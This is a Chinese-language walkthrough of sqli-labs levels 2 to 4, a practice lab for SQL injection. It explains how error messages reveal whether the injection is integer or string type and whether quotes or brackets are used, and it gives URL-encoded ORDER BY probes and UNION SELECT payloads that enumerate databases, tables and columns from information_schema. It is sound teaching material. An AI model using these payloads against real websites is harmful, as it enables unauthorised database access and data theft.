sqli-labs(二)
第二关:
sqli-labs的第二关是有报错信息的int类型的sql注入,输入id=1'后也会报错,如下图
可以看到报错信息种显示的是'' limit 0,1' 这处有错,其中前后两个单引符号是报错信息自己加上去的,所以真正在sql语句的字符串是 'limit 0,1 是可以看出来该处是个int类型的sql注入(如果是string类型的注入,报错一般是 ''1'' limit 0,1'。当然判断注入的类型也可以通过在后面加 and 1=1 以及 ' and '1'='1)
操作步骤和第一关类似
第一步:通过order by来判断表的列数
id=1%20order%20by%203%23
id=1%20order%20by%204%23
第二步:查看数据库名,当前用户,数据库版本
id=-1%20union%20select%201,group_concat(schema_name),concat_ws(':',user(),version(),database())%20from%20information_schema.schemata%23
后面和第一关一样。。。。
第三关:其实实际测试过程种,我们是不知道后台sql语句到底是怎样了,如果又报错信息就很好判断了
第三关中输入id=1' 页面报错信息如下:
这里我们还是将前后得'去除掉,sql语句片段是'1'') limit 0,1
可以看出这里是个string类型得注入,并且后台种带有括号,这里推测后台查询语句应该是select * from tables where id =( '***') limit 0,1
现在再来看下实际得sql语句
ok,我们还是按照之前得流程来
第一步:使用order by来判断表的列数
id=1')%20order%20by%203%20%23 正常
id=1')%20order%20by%204%20%23 报错
第二步:查出所有的数据库名,当前数据库名以及当前用户等信息
id=-1')union%20select%201,group_concat(schema_name),concat_ws(':',user(),version(),database())%20from%20information_schema.schemata%23
第三步:查询出security中所有的表名(注意这里的security需要用引号)
id=-1')union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema='security'%23
第四步:查询出user表中的列名
id=-1')union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name='user'%23
第四关
还是老套路,输入?id=1',发现并没有报错(和直接输入id=1的页面显示的一样的)
再输入?id=1",发现报错
根据我们之前分析报错信息的方法很容易看出后台sql的拼凑方法,只不过是将第三关的单引符号改为了双引符号。
后面的就不继续了,直接下一关吧。。。。